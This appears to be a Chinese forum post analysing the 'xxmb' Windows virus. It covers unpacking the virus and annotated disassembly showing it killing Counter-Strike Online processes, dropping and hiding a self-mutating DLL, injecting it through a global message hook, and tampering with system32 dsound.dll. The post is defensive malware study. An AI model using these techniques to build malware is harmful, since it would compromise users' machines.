之前论坛上已有发大牛分析了,抱着学习目的练习下
病毒名称: xxmb
壳信息: yoda's Protector v1.02 (.dll,.ocx) -> Ashkbiz Danehkar (h)
可能受到威胁的系统: windows
相关漏洞: 无
文件系统变化
生成如下文件:
C:\DOCUME~1\jack\LOCALS~1\Temp\kb712959.sve (Kb后面的数值名称是随机生成的)
C:\Program Files\Common Files\System\kb712959.dla (由kb712959.sve拷贝得来的)
C:\WINDOWS\system32\dsound.dll
C:\WINDOWS\system32\dsound.dll.YUCH
C:\WINDOWS\system32\DllCache\dsound.dll
C:\WINDOWS\system32\DllCache\dsound.dll.YUCH
详细分析/功能介绍
1.提升本进程权限,查看 "CSOLauncher.exe", "cstrike-online.exe"连个进程是否存在
首先PEID查壳 :发现入口RVA:1000 .text段
但是显示是 yoda's Protector v1.02 (.dll,.ocx) -> Ashkbiz Danehkar 壳 具体的看看,果然是在加壳之后,又改了入口。
00401000 >/$ B8 D507D0B0 mov eax,0xB0D007D5
00401005 |? B8 6FA04000 mov eax,server.0040A06F
0040100A |? 8BC0 mov eax,eax
0040100C |? 8BD2 mov edx,edx ; ntdll.KiFastSystemCallRet
0040100E |? 55 push ebp
0040100F |? 8BE9 mov ebp,ecx
00401011 |. 5D pop ebp
00401012 |? 50 push eax
00401013 |? 51 push ecx
00401014 |? 8BC8 mov ecx,eax
00401016 |. 59 pop ecx
00401017 |. C3 retn ; 将0040A06F压栈 使用retn指令 返回到40A06F处执行外壳程序
说以现在我们可以更改OEP为 A06F,,,,,然后再去看看可不可以脱壳。
可以看到外壳,使用esp定律就可以脱了
0040A06F > 60 pushad
0040A070 83EC 38 sub esp,0x38
0040A073 33C0 xor eax,eax
0040A075 C745 D8 4765745>mov dword ptr ss:[ebp-0x28],0x50746547
0040A07C C745 DC 726F634>mov dword ptr ss:[ebp-0x24],0x41636F72
0040A083 C745 E0 6464726>mov dword ptr ss:[ebp-0x20],0x65726464
0040A08A C745 E4 7373000>mov dword ptr ss:[ebp-0x1C],0x7373
脱壳之后,可以再用PEID查看,是Microsoft Visual C++ 6.0写的
004048B4 >/$ 55 push ebp
004048B5 |. 8BEC mov ebp,esp
004048B7 |. 6A FF push -0x1
004048B9 |. 68 E8504000 push Cracker.004050E8
004048BE |. 68 20484000 push <jmp.&MSVCRT._except_handler3> ; SE 处理程序安装
004048C3 |. 64:A1 0000000>mov eax,dword ptr fs:[0]
004048C9 |. 50 push eax
接下来进入正题了:
单步到
0040382F call 00402B29 跟进
00402BF8 |. C645 E9 65 mov byte ptr ss:[ebp-0x17],0x65
00402BFC |. C645 EA 67 mov byte ptr ss:[ebp-0x16],0x67
00402C00 |. C645 EB 65 mov byte ptr ss:[ebp-0x15],0x65 ; SeDebugPrivileg, cstrike-online.exe, CSOLauncher
00402C04 |. E8 26E8FFFF call Cracker.0040142F ; 提升本进程权限
00402C09 |. 8D45 F0 lea eax,[local.4]
00402C0C |. 50 push eax ; CSOLauncher.exe
00402C0D |. E8 73E6FFFF call Cracker.00401285
00402C12 |. 8D45 C8 lea eax,[local.14]
00402C15 |. 50 push eax ; "cstrike-online.exe"
00402C16 |. E8 6AE6FFFF call Cracker.00401285
跟进40142F看下
0040146F |. C645 FA 6C mov byte ptr ss:[ebp-0x6],0x6C ; |
00401473 |. C645 FB 6C mov byte ptr ss:[ebp-0x5],0x6C ; |Advapi.dll
00401477 |. 885D FC mov byte ptr ss:[ebp-0x4],bl ; |
0040147A |. FFD6 call esi ; \LoadLibraryA
00401558 |. C645 A8 6C mov byte ptr ss:[ebp-0x58],0x6C
0040155C |. C645 A9 65 mov byte ptr ss:[ebp-0x57],0x65
00401560 |. C645 AA 67 mov byte ptr ss:[ebp-0x56],0x67
00401564 |. C645 AB 65 mov byte ptr ss:[ebp-0x55],0x65
00401568 |. 8D45 DC lea eax,[local.9]
0040156B |. C645 AC 73 mov byte ptr ss:[ebp-0x54],0x73 ; OpenProcessToken, LookupPrivilegeVauleA, AdjustTokenPrivilege
0040156F |. 50 push eax ;“FuncName”
00401570 |. 57 push edi ;hModuleDll
00401571 |. 885D AD mov byte ptr ss:[ebp-0x53],bl
00401574 |. E8 A7030000 call Cracker.00401920
大家可以跟进401920看看 使用模块句柄,与函数名查找,导出表地址
然后在kernel32.dll中得到CloseHandle,GetCurrentProcess两个进程
GetCurrentProcess---->OpenProcessToken----->LookupPrivilegeValueA---->AdjustTokenPrivileges---->CloseHandle
00401610 |. FFD0 call eax ; GetCurrentProcess
00401612 |. 50 push eax
00401613 |. FF55 88 call [local.30] ; OpenProcessToken
00401616 |. 85C0 test eax,eax
00401618 |. 74 5C je XCracker.00401676
0040161A |. 8D85 7CFFFFFF lea eax,[local.33]
00401620 |. 50 push eax
00401621 |. FF75 08 push [arg.1]
00401624 |. 53 push ebx
00401625 |. FF55 8C call [local.29] ; LookupprivilegeValueA
00401628 |. 85C0 test eax,eax
0040165F |. 53 push ebx
00401660 |. 50 push eax
00401661 |. 53 push ebx
00401662 |. 89B5 6CFFFFFF mov [local.37],esi
00401668 |. FF75 94 push [local.27]
0040166B |. FF55 84 call [local.31] ; AdjustTokenPrivileges
跟进call Cracker.00401285
调用LoadLibraryA加载kernel32.dll,然后得到CreateToolhelp32Snapshot,Process32First,Process32Next,然
后查找CSOLauncher.exe,cstrike-online.exe进程,如果找到结束该进程。
对应代码
004013C7 |. FFD3 call ebx ; CreateToolhelp32Snapshot
004013C9 |. 8BD8 mov ebx,eax
004013CB |. EB 03 jmp XCracker.004013D0
004013CD |> 8B5D 08 mov ebx,[arg.1]
004013D0 |> 83FB FF cmp ebx,-0x1
004013D3 |. 75 04 jnz XCracker.004013D9
004013D5 |. 33C0 xor eax,eax
004013D7 |. EB 51 jmp XCracker.0040142A
004013D9 |> 8D85 94FEFFFF lea eax,[local.91]
004013DF |. C785 94FEFFFF>mov [local.91],0x128
004013E9 |. 50 push eax
004013EA |. 53 push ebx
004013EB |. FF55 BC call [local.17] ; Process32First
004013EE |. 85C0 test eax,eax
004013F0 |. 74 33 je XCracker.00401425
004013F2 |> 8D85 B8FEFFFF /lea eax,[local.82]
004013F8 |. 50 |push eax
004013F9 |. FF75 08 |push [arg.1] ; 进程名
004013FC |. E8 CA020000 |call Cracker.004016CB ; 相当于strcmp
00401401 |. 59 |pop ecx
00401402 |. 85C0 |test eax,eax
00401404 |. 59 |pop ecx
00401405 |. 75 0C |jnz XCracker.00401413
00401407 |. FFB5 9CFEFFFF |push [local.89] ; 进程PID
0040140D |. E8 8DFDFFFF |call Cracker.0040119F ; OpenProcess TerminateProcess
00401412 |. 59 |pop ecx ; ntdll.7C92F641
00401413 |> 8D85 94FEFFFF |lea eax,[local.91]
00401419 |. 50 |push eax
0040141A |. 53 |push ebx
0040141B |. FF55 C0 |call [local.16] ; Process32Next
0040141E |. 85C0 |test eax,eax
00401420 |.^ 75 D0 \jnz XCracker.004013F2
2.将资源写入临时文件C:\DOCUME~1\jack\LOCALS~1\Temp\kb******.sve(******是一串随机数),拷贝变型了的临时文件到 C:\Program Files\Common Files\System\kd******.dla, 并将文件属性设置为隐藏
00403840 |. 8BF8 mov edi,eax
00403842 |. 56 push esi ; /n
00403843 |. 6A 00 push 0x0 ; |c = 00
00403845 |. 57 push edi ; |s
00403846 |. E8 E70F0000 call <jmp.&MSVCRT.memset> ; \memset
0040384B |. 6A 00 push 0x0
0040384D |. 57 push edi
0040384E |. 6A 06 push 0x6
00403850 |. E8 F7F3FFFF call Cracker.00402C4C
跟进关键call 402C4C
00402D35 |. C645 88 53 mov byte ptr ss:[ebp-0x78],0x53 ; copyfile
00402D39 |. AA stos byte ptr es:[edi]
00402D3A |. C645 89 4F mov byte ptr ss:[ebp-0x77],0x4F
00402D3E |. C645 8A 46 mov byte ptr ss:[ebp-0x76],0x46
00402D42 |. C645 8B 54 mov byte ptr ss:[ebp-0x75],0x54
00402D46 |. C645 8C 57 mov byte ptr ss:[ebp-0x74],0x57
00402D4A |. C645 8D 41 mov byte ptr ss:[ebp-0x73],0x41
00402D4E |. C645 8E 52 mov byte ptr ss:[ebp-0x72],0x52
00402D52 |. C645 8F 45 mov byte ptr ss:[ebp-0x71],0x45
00402D56 |. C645 90 5C mov byte ptr ss:[ebp-0x70],0x5C
00402D5A |. C645 91 41 mov byte ptr ss:[ebp-0x6F],0x41
00402D5E |. 8B7D 0C mov edi,[arg.2] ; 堆首地址
00402D61 |. 8065 9F 00 and byte ptr ss:[ebp-0x61],0x0
00402D65 |. 8065 CE 00 and byte ptr ss:[ebp-0x32],0x0
00402D69 |. 8065 CF 00 and byte ptr ss:[ebp-0x31],0x0
00402D6D |. 8065 BD 00 and byte ptr ss:[ebp-0x43],0x0
00402D71 |. 8D45 B8 lea eax,[local.18]
00402D74 |. 6A 76 push 0x76
00402D76 |. 50 push eax
00402D77 |. 57 push edi
00402D78 |. C645 92 68 mov byte ptr ss:[ebp-0x6E],0x68
00402D7C |. C645 93 6E mov byte ptr ss:[ebp-0x6D],0x6E
00402D80 |. C645 94 4C mov byte ptr ss:[ebp-0x6C],0x4C
00402D84 |. C645 95 61 mov byte ptr ss:[ebp-0x6B],0x61
00402D88 |. C645 96 62 mov byte ptr ss:[ebp-0x6A],0x62
00402D8C |. C645 97 5C mov byte ptr ss:[ebp-0x69],0x5C
00402D90 |. C645 98 48 mov byte ptr ss:[ebp-0x68],0x48
00402D94 |. C645 99 53 mov byte ptr ss:[ebp-0x67],0x53
00402D98 |. C645 9A 68 mov byte ptr ss:[ebp-0x66],0x68
00402D9C |. C645 9B 69 mov byte ptr ss:[ebp-0x65],0x69
00402DA0 |. C645 9C 65 mov byte ptr ss:[ebp-0x64],0x65
00402DA4 |. C645 9D 6C mov byte ptr ss:[ebp-0x63],0x6C
00402DA8 |. C645 9E 64 mov byte ptr ss:[ebp-0x62],0x64 ; SOFTWARE\AhnLad\HShield
00402DAC |. C645 B8 6D mov byte ptr ss:[ebp-0x48],0x6D
00402DB0 |. C645 B9 73 mov byte ptr ss:[ebp-0x47],0x73
00402DB4 |. C645 BA 63 mov byte ptr ss:[ebp-0x46],0x63
00402DB8 |. C645 BB 72 mov byte ptr ss:[ebp-0x45],0x72
00402DBC |. C645 BC 6F mov byte ptr ss:[ebp-0x44],0x6F ; mscro
00402DC0 |. E8 C9F7FFFF call Cracker.0040258E
这个call,将资源写入临时文件C:\DOCUME~1\jack\LOCALS~1\Temp\kb******.sve(******是一串随机数)
首先
004025FE |. 885D C8 mov byte ptr ss:[ebp-0x38],bl ; GetTempPathA
00402601 |. E8 1AF3FFFF call Cracker.00401920
00402606 |. 59 pop ecx
00402607 |. 59 pop ecx
00402608 |. 8D8D 60FEFFFF lea ecx,[local.104]
0040260E |. 51 push ecx ; 存放临时文件路进
0040260F |. 68 04010000 push 0x104
00402614 |. FFD0 call eax ; GetTempPathA 创建临时文件
00402616 |. 85C0 test eax,eax
然后使用相同的方式得到FindResource--->LoadResource--->SizeOfResource->LockResource->FreeResource
就下来是 使用time() 产生一个种子,随机生成6个字符的字符串 构成kb******.sve
00402789 |. FF15 98504000 call dword ptr ds:[<&MSVCRT.time>] ; \time
0040278F |. 50 push eax ; /seed
00402790 |. FF15 94504000 call dword ptr ds:[<&MSVCRT.srand>] ; \srand
00402796 |. 83C4 30 add esp,0x30
00402799 |. 6A 02 push 0x2
0040279B |. 5F pop edi
0040279C |> FF15 90504000 /call dword ptr ds:[<&MSVCRT.rand>] ; [rand
004027A2 |. 6A 0A |push 0xA
004027A4 |. 99 |cdq
004027A5 |. 59 |pop ecx
004027A6 |. F7F9 |idiv ecx
004027A8 |. 80C2 30 |add dl,0x30
004027AB |. 88943D 64FFFF>|mov byte ptr ss:[ebp+edi-0x9C],dl
004027B2 |. 47 |inc edi
004027B3 |. 83FF 08 |cmp edi,0x8 ; while(edi < 0x8)
004027B6 |.^ 7C E4 \jl XCracker.0040279C
004027B8 |. C6843D 64FFFF>mov byte ptr ss:[ebp+edi-0x9C],0x2E
004027C0 |. 47 inc edi
004027C1 |. 8D85 64FFFFFF lea eax,[local.39]
004027C7 |. C6843D 64FFFF>mov byte ptr ss:[ebp+edi-0x9C],0x73
004027CF |. 47 inc edi
004027D0 |. 50 push eax
004027D1 |. 8D85 60FEFFFF lea eax,[local.104]
004027D7 |. C6843D 64FFFF>mov byte ptr ss:[ebp+edi-0x9C],0x76
004027E0 |. 50 push eax ; 临时文件路径
004027E1 |. C6843D 64FFFF>mov byte ptr ss:[ebp+edi-0x9C],0x65
004027E9 |. 889C3D 65FFFF>mov byte ptr ss:[ebp+edi-0x9B],bl
004027F0 |. E8 A5EFFFFF call Cracker.0040179A ; strcat
004027F5 |. 8D85 60FEFFFF lea eax,[local.104]
004027FB |. 50 push eax ; C:\DOCUME~1\jack\LOCALS~1\Temp\kb420995.sve
004027FC |. FF75 08 push [arg.1] ; 堆首地址
004027FF |. E8 9FEEFFFF call Cracker.004016A3 ; 将生成路径名拷贝到堆区
0040280A |. 53 push ebx ; /pModule
0040280B |. FF15 04504000 call dword ptr ds:[<&kernel32.GetModuleH>; \GetModuleHandleA
00402811 |. FF75 0C push [arg.2] ; mscro (自己指定的资源类型)
00402814 |. 8BF8 mov edi,eax
00402816 |. FF75 10 push [arg.3] ; 资源ID = 76
00402819 |. 57 push edi
0040281A |. FF55 84 call [local.31] ; FindResoureA 定位所指定的资源
0040281D |. 8945 08 mov [arg.1],eax ; HRSRC
00402820 |. 50 push eax
00402821 |. 58 pop eax
00402822 |. 395D 08 cmp [arg.1],ebx
00402825 |. 0F84 9B000000 je Cracker.004028C6
0040282B |. FF75 08 push [arg.1] ; HRSRC
0040282E |. 57 push edi ; hModule
0040282F |. FF55 88 call [local.30] ; LoadResource 加载指定资源到内存
00402832 |. 3BC3 cmp eax,ebx ; 407070 是 指向资源数据的内存指针
0040284F |. 57 push edi
00402850 |. FF55 98 call [local.26] ; SizeOfResource 得到资源大小
00402853 |. BF 10604000 mov edi,Cracker.00406010 ; ASCII "Kernel32.dll"
00402858 |. 68 44604000 push Cracker.00406044 ; ASCII "CreateFileA"
0040285D |. 57 push edi
0040285E |. 8945 98 mov [local.26],eax ; 【local.26】 = 2800 资源大小
00402861 |. FFD6 call esi
00402863 |. 50 push eax
00402864 |. E8 B7F0FFFF call Cracker.00401920
00402869 |. 59 pop ecx
0040286A |. 8945 08 mov [arg.1],eax ; CreateFile
0040286D |. 59 pop ecx
0040286E |. 68 50604000 push Cracker.00406050 ; ASCII "CloseHandle"
00402873 |. 57 push edi
00402874 |. FFD6 call esi
00402876 |. 50 push eax
00402877 |. E8 A4F0FFFF call Cracker.00401920
0040287C |. 59 pop ecx
0040287D |. 8945 0C mov [arg.2],eax
00402880 |. 59 pop ecx
00402881 |. 8D85 60FEFFFF lea eax,[local.104]
00402887 |. 53 push ebx
00402888 |. 53 push ebx
00402889 |. 6A 02 push 0x2
0040288B |. 53 push ebx
0040288C |. 53 push ebx
0040288D |. 68 000000C0 push 0xC0000000
00402892 |. 50 push eax ; C:\DOCUME~1\jack\LOCALS~1\Temp\kb420995.sve
00402893 |. FF55 08 call [arg.1] ; CreateFile
00402896 |. 8BF0 mov esi,eax
00402898 |. 83FE FF cmp esi,-0x1
0040289B |. 0F84 A4000000 je Cracker.00402945
004028A1 |. 8D45 FC lea eax,[local.1]
004028A4 |. 53 push ebx ; /pOverlapped
004028A5 |. 50 push eax ; |pBytesWritten
004028A6 |. 8B3D 1C504000 mov edi,dword ptr ds:[<&kernel32.WriteFi>; |kernel32.WriteFile
004028AC |. FF75 98 push [local.26] ; |SizeOfResorce 返回值 = 0x2800
004028AF |. FF75 94 push [local.27] ; |Buffer = 407070 指向资源指针
004028B2 |. 56 push esi ; |hFile 临时文件句柄
004028B3 |. FFD7 call edi ; \WriteFile
00402DCD |. E8 85FBFFFF call Cracker.00402957 ; 打开母本读取母本后两双字,在临时文件末尾追加随机数据,之后将母本读出双字写入临时文件。目的变型文件,以至每次运行不一样。大家可以跟进去看看
接下来时对注册表操作
00402E36 |. C645 A7 2E mov byte ptr ss:[ebp-0x59],0x2E
00402E3A |. C645 A8 62 mov byte ptr ss:[ebp-0x58],0x62
00402E3E |. C645 A9 65 mov byte ptr ss:[ebp-0x57],0x65
00402E42 |. C645 AA 74 mov byte ptr ss:[ebp-0x56],0x74 ; SOFTWORE\Ahnlad\HShield.dbghelp.bet
00402E46 |. E8 57F0FFFF call Cracker.00401EA2
跟进call 401EA2
00401EB3 |. FF75 08 push [arg.1]
00401EB6 |. E8 06FCFFFF call Cracker.00401AC1 ; RegOpenKeyExA 打开子键 SOFTWORE\Ahnlad\HShield 会打开失败 大家可以跟进去看看
00401F84 |. C645 D1 68 mov byte ptr ss:[ebp-0x2F],0x68 ; |
00401F88 |. C645 D2 65 mov byte ptr ss:[ebp-0x2E],0x65 ; |Software\Microsoft\windows\ShellNoRoam\MUICache
00401F8C |. 885D D3 mov byte ptr ss:[ebp-0x2D],bl ; |
00401F8F |. C645 E4 41 mov byte ptr ss:[ebp-0x1C],0x41 ; |
00401F93 |. C645 E5 64 mov byte ptr ss:[ebp-0x1B],0x64 ; |
00401F97 |. C645 E6 76 mov byte ptr ss:[ebp-0x1A],0x76 ; |
00401F9B |. C645 E7 61 mov byte ptr ss:[ebp-0x19],0x61 ; |
00401F9F |. C645 E8 70 mov byte ptr ss:[ebp-0x18],0x70 ; |
00401FA3 |. C645 E9 69 mov byte ptr ss:[ebp-0x17],0x69 ; |
00401FA7 |. C645 EA 33 mov byte ptr ss:[ebp-0x16],0x33 ; |
00401FAB |. C645 EB 32 mov byte ptr ss:[ebp-0x15],0x32 ; |
00401FAF |. C645 EC 2E mov byte ptr ss:[ebp-0x14],0x2E ; |
00401FB3 |. C645 ED 64 mov byte ptr ss:[ebp-0x13],0x64 ; |
00401FB7 |. C645 EE 6C mov byte ptr ss:[ebp-0x12],0x6C ; |
00401FBB |. C645 EF 6C mov byte ptr ss:[ebp-0x11],0x6C ; |Avdapi32.dll
00401FBF |. 885D F0 mov byte ptr ss:[ebp-0x10],bl ; |
00401FC2 |. FF15 00504000 call dword ptr ds:[<&kernel32.LoadLibraryA>] ; \LoadLibraryA
00401FC8 |. 8BF0 mov esi,eax
00401FCA |. 3BF3 cmp esi,ebx
00401FCC |. 0F84 BB000000 je Cracker.0040208D
00401FD2 |. 8D45 D4 lea eax,[local.11]
00401FD5 |. 57 push edi ; 临时文件
0040203B |. 885D FF mov byte ptr ss:[ebp-0x1],bl
0040203E |. E8 DDF8FFFF call Cracker.00401920
00402043 |. 8BF8 mov edi,eax ; edi = RegOpenKeyExA
00402045 |. 8D45 F4 lea eax,[local.3]
00402048 |. 50 push eax
00402049 |. 56 push esi
0040204A |. E8 D1F8FFFF call Cracker.00401920
0040204F |. 83C4 10 add esp,0x10
00402052 |. 8BF0 mov esi,eax ; esi = RegCloseKey
00402054 |. 8D45 14 lea eax,[arg.4]
00402057 |. 50 push eax
00402058 |. 68 19000200 push 0x20019
0040205D |. 8D45 A4 lea eax,[local.23]
00402060 |. 53 push ebx
00402061 |. 50 push eax ; Software\Microsoft\windows\ShellNoRoam\MUICache
00402062 |. 68 01000080 push 0x80000001 ; HKEY_CURRENT_USER
00402067 |. FFD7 call edi ; RegOpenKeyExA
00402069 |. 85C0 test eax,eax ; if(iRet==ERROR_SUCCESS)
0040206B |. 5F pop edi
0040206C |. 75 11 jnz XCracker.0040207F
0040206E |. FF75 18 push [arg.5] ; 打开子键成功
00402071 |. FF75 14 push [arg.4]
00402074 |. FF75 08 push [arg.1]
00402077 |. E8 4CFCFFFF call Cracker.00401CC8
咦咦没有改注册表啊,,,?? 继续吧
接下来拷贝变型了的临时文件到 C:\Program Files\Common Files\System\kd******.dla, 并将文件属性设置为隐藏
0040318B |. C645 D5 65 mov byte ptr ss:[ebp-0x2B],0x65
0040318F |. C645 D6 6D mov byte ptr ss:[ebp-0x2A],0x6D ; \System
00403193 |. E8 E3E4FFFF call Cracker.0040167B
00403198 |. 8BF8 mov edi,eax
0040319A |. 47 inc edi
0040319B |. 57 push edi ; kb******.sve
0040319C |. E8 E3E5FFFF call Cracker.00401784 ; strlen
004031A1 |. 83E8 03 sub eax,0x3
004031A4 |. 50 push eax ; /maxlen
004031A5 |. 8D85 4CFFFFFF lea eax,[local.45] ; |复制kd******.
004031AB |. 57 push edi ; |src
004031AC |. 50 push eax ; |dest
004031AD |. FF15 9C504000 call dword ptr ds:[<&MSVCRT.strncpy>] ; \strncpy
004031B3 |. 8D85 4CFFFFFF lea eax,[local.45]
004031B9 |. 68 7C604000 push Cracker.0040607C ; ASCII "dla"
004031BE |. 50 push eax ; kd******.
004031BF |. E8 D6E5FFFF call Cracker.0040179A ; strcat
004031C4 |. 8D85 4CFFFFFF lea eax,[local.45]
004031CA |. 50 push eax ; kd******.dla
004031CB |. 8D85 B8F9FFFF lea eax,[local.402]
004031D1 |. 50 push eax
004031D2 |. E8 CCE4FFFF call Cracker.004016A3 ; memcpy(12F8B0, "kd******.dla")
00403261 |. 8D85 B8F9FFFF lea eax,[local.402]
00403267 |. 50 push eax ; ke******.dla
00403268 |. 8D85 48FEFFFF lea eax,[local.110]
0040326E |. 50 push eax
0040326F |. E8 26E5FFFF call Cracker.0040179A ; strcat
00403274 |. 83C4 18 add esp,0x18
00403277 |> 8D85 48FEFFFF lea eax,[local.110] ; C:\Program File\Common Files\Common Filesa\System\ke******.dla
0040327D |. 50 push eax
0040327E |. E8 01E5FFFF call Cracker.00401784 ; strlen
00403283 |. 85C0 test eax,eax
00403285 |. 59 pop ecx
00403286 |. 0F84 35010000 je Cracker.004033C1
0040328C |. 8D85 48FEFFFF lea eax,[local.110]
00403292 |. 68 80000000 push 0x80 ; /FileAttributes = NORMAL
00403297 |. 50 push eax ; |FileName
00403298 |. FF15 24504000 call dword ptr ds:[<&kernel32.SetFileAttributes>; \SetFileAttributesA
0040329E |. 8D85 48FEFFFF lea eax,[local.110]
004032A4 |. 6A 00 push 0x0
004032A6 |. 50 push eax ; C:\Program File\Common Files\Common Filesa\System\ke******.dla
004032A7 |. FF75 0C push [arg.2] ; 临时文件路径
004032AA |. FF55 C4 call [local.15] ; copyfile
0040336C |. 8BD8 mov ebx,eax ; ebx = SetFIleAttributes
0040336E |. 59 pop ecx
0040336F |. 8D85 48FEFFFF lea eax,[local.110]
00403375 |. 50 push eax ; C:\Program File\Common Files\Common Filesa\System\ke******.dla
00403376 |. FFD7 call edi ; edi = GetFileAttributesA,
00403378 |. 0C 02 or al,0x2 ; 与上 FILE_ATTRIBUTE_HIDDEN
0040337A |. 50 push eax
0040337B |. 8D85 48FEFFFF lea eax,[local.110]
00403381 |. 50 push eax
00403382 |. FFD3 call ebx ; SetFIleAttributes 隐藏文件
3. 加载临时文件, 获取他的导出函数LoadDll, 然后调用LoadDll安全全局钩子(钩子类型WH_GETMESSAGE)
0040339F |. C645 C5 6C mov byte ptr ss:[ebp-0x3B],0x6C
004033A3 |. C645 C6 6C mov byte ptr ss:[ebp-0x3A],0x6C ; LoadDll
004033A7 |. FFD6 call esi ; LoadLibrary (加载临时文件)
004033A9 |. 8D4D C0 lea ecx,[local.16]
004033AC |. 51 push ecx ; LoadDll
004033AD |. 50 push eax ; hModule
004033AE |. E8 6DE5FFFF call Cracker.00401920
004033B3 |. 59 pop ecx
004033B4 |. 59 pop ecx
004033B5 |. 85C0 test eax,eax
004033B7 |. 74 08 je XCracker.004033C1
004033B9 |. FFD0 call eax ; LoadDll 导出函数
跟进 call eax
发现安装WH_GETMESSAGE类型的全局钩子,在回调函数里都没做,说明这个导出函数目的就是让任何线程调用GetMessage或PeekMessage时加载这个dll,,,, 感觉这个dll里面很邪恶。
10002082 FF7424 0C push dword ptr ss:[esp+0xC]
10002086 FF7424 0C push dword ptr ss:[esp+0xC]
1000208A FF7424 0C push dword ptr ss:[esp+0xC]
1000208E FF35 00600010 push dword ptr ds:[0x10006000]
10002094 FF15 DC400010 call dword ptr ds:[0x100040DC] ; USER32.CallNextHookEx
1000209A C2 0C00 retn 0xC
1000209D > 6A 00 push 0x0 ; 0 全局钩子
1000209F FF35 00530010 push dword ptr ds:[0x10005300] ; kb372004.10000000
100020A5 68 82200010 push kb372004.10002082 ; Hook_CallBack
100020AA 6A 03 push 0x3 ; WH_GETMESSAGE
100020AC FF15 D8400010 call dword ptr ds:[0x100040D8] ; USER32.SetWindowsHookExA
100020B2 A3 00600010 mov dword ptr ds:[0x10006000],eax
100020B7 C3 retn
100020B8 > FF35 00600010 push dword ptr ds:[0x10006000]
100020BE FF15 D4400010 call dword ptr ds:[0x100040D4] ; USER32.UnhookWindowsHookEx
100020C4 C3 retn
4. 判断C:\windows\system32\dsound.dll文件是都存在,存在就拷贝一份,命名为C:\windows\system32\dsound.dll.dat
00402411 |. C645 D8 41 mov byte ptr ss:[ebp-0x28],0x41 ; CopyFile
00402415 |. 885D D9 mov byte ptr ss:[ebp-0x27],bl
00402418 |. E8 70F4FFFF call Cracker.0040188D ; 这个call里调用GetSystemDirectory
0040241D |. 8D85 08FCFFFF lea eax,[local.254]
00402423 |. 50 push eax
00402424 |. 8D85 0CFDFFFF lea eax,[local.189]
0040242A |. 50 push eax
0040242B |. E8 73F2FFFF call Cracker.004016A3
00402430 |. FF75 08 push [arg.1] ; dsound.dll
00402433 |. 8D85 0CFDFFFF lea eax,[local.189]
00402439 |. 50 push eax
0040243A |. E8 5BF3FFFF call Cracker.0040179A ; strcat
0040243F |. 8D85 0CFDFFFF lea eax,[local.189] ; C:\windows\system32\dsound.dll
00402445 |. 50 push eax
00402446 |. 8D85 10FEFFFF lea eax,[local.124] ; newbuf
0040244C |. 50 push eax
0040244D |. E8 51F2FFFF call Cracker.004016A3 ; memcpy
00402452 |. 8D45 E4 lea eax,[local.7]
00402455 |. 50 push eax ; .dat
00402456 |. 8D85 10FEFFFF lea eax,[local.124]
0040245C |. 50 push eax
0040245D |. E8 38F3FFFF call Cracker.0040179A ; C:\windows\system32\dsound.dll.dat
00402462 |. 83C4 24 add esp,0x24
00402465 |. 8D45 D0 lea eax,[local.12]
00402468 |. 50 push eax ; CopyFile
00402469 |. 68 10604000 push Cracker.00406010 ; /FileName = "Kernel32.dll"
0040246E |. FF15 00504000 call dword ptr ds:[<&kernel32.LoadLibraryA>] ; \LoadLibraryA
00402474 |. 50 push eax
00402475 |. E8 A6F4FFFF call Cracker.00401920
0040247A |. 8BF8 mov edi,eax ; edi = CopyFile
0040247C |. 8D85 0CFDFFFF lea eax,[local.189]
00402482 |. 50 push eax ; C:\windows\system32\dsound.dll
00402483 |. E8 3CF3FFFF call Cracker.004017C4 ; 调用FindFirstFile 查看传入参数文件是否存在
00402488 |. 8BF0 mov esi,eax
0040248A |. 8D85 10FEFFFF lea eax,[local.124]
00402490 |. 50 push eax ; 看C:\windows\system32\dsound.dll.dat是否存在
004024B2 |> \8D85 10FEFFFF lea eax,[local.124]
004024B8 |. 53 push ebx
004024B9 |. 50 push eax
004024BA |. 8D85 0CFDFFFF lea eax,[local.189] ; C:\windows\system32\dsound.dll.dat
004024C0 |. 50 push eax ; C:\windows\system32\dsound.dll
004024C1 |. FFD7 call edi ; copyfile
004024C3 |> 8D8D 14FFFFFF lea ecx,[local.59] ; 系统目录\system\"下是否存在"dsound.dll"文件,如果存在则备份dsound.dll
004024C9 |. C645 DC 2E mov byte ptr ss:[ebp-0x24],0x2E
接下来使用备份文件dsound.dll.bat
004024DD |. C645 E1 36 mov byte ptr ss:[ebp-0x1F],0x36 ; .text6
004024E1 |. 885D E2 mov byte ptr ss:[ebp-0x1E],bl
004024E4 |. C645 EC 2E mov byte ptr ss:[ebp-0x14],0x2E
004024E8 |. C645 ED 74 mov byte ptr ss:[ebp-0x13],0x74
004024EC |. C645 EE 65 mov byte ptr ss:[ebp-0x12],0x65
004024F0 |. C645 EF 78 mov byte ptr ss:[ebp-0x11],0x78
004024F4 |. C645 F0 74 mov byte ptr ss:[ebp-0x10],0x74
004024F8 |. C645 F1 38 mov byte ptr ss:[ebp-0xF],0x38 ; .text8
004024FC |. 885D F2 mov byte ptr ss:[ebp-0xE],bl
004024FF |. E8 6D130000 call Cracker.00403871 ; new 后面拷贝备份文件使用
00402504 |. 8D85 10FEFFFF lea eax,[local.124] ; C:\windows\system32\dsound.dll.dat
0040250A |. 8D8D 14FFFFFF lea ecx,[local.59]
00402510 |. 50 push eax
00402511 |. 895D FC mov [local.1],ebx
00402514 |. E8 A5170000 call Cracker.00403CBE
跟进call 00403CBE
00403D5E |. 6A 00 push 0x0 ; /pOverlapped = NULL
00403D60 |. 51 push ecx ; |pBytesRead
00403D61 |. FF76 04 push dword ptr ds:[esi+0x4] ; | FileSize
00403D64 |. 50 push eax ; |Buffer
00403D65 |. 57 push edi ; |hFile
00403D66 |. FF15 10504000 call dword ptr ds:[<&kernel32.ReadFile>] ; \ReadFile
00403D6C |. 57 push edi ; 将备份的dsound.dll.bat文件读入缓冲区
接下来使用memcpy分段拷贝dsound.dll.bat 到全面准备好的缓冲区中
00403D6D |. FF5424 14 call dword ptr ss:[esp+0x14]
00403D71 |. 55 push ebp ; /40 拷贝dsound.dll.bat文件pe头前0x40字节到00393AD0
00403D72 |. FF36 push dword ptr ds:[esi] ; |src
00403D74 |. FF76 08 push dword ptr ds:[esi+0x8] ; |dest
00403D77 |. E8 B00A0000 call <jmp.&MSVCRT.memcpy> ; \memcpy
00403D7C |. 8B46 08 mov eax,dword ptr ds:[esi+0x8]
00403DEB |> \0FB768 06 movzx ebp,word ptr ds:[eax+0x6] ; 区块个数
00403DEF |. 85ED test ebp,ebp
00403DF1 |. 76 6E jbe XCracker.00403E61
00403DF3 |. 836424 1C 00 and dword ptr ss:[esp+0x1C],0x0
